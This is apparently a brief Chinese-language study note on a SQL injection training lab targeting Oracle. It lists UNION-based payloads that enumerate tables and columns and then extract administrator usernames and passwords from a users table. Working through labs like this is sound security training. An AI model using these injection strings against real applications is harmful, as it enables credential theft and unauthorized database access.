SQLi lab： Equivalent to information schema on Oracle

对于oracle数据库

'+UNION+SELECT+table_name,NULL+FROM+all_tables--

btw，如果是非oracle数据的库

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

获取了table name，这几个users table 看起来像吗？

 接下来试着查下这几个表的column

'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USER'--

啥也没读出来。。。。

然后换一个，MEXYAA，读出来，这两个看起来像账号密码的column name

 接下来读administrator吧

这两个列

PASSWORD_IURFRJ

USERNAME_YPUOMR

'+UNION+SELECT+USERNAME_YPUOMR,+PASSWORD_IURFRJ+FROM+USERS_MEXYAA--

 然后当然是。。。

---

reference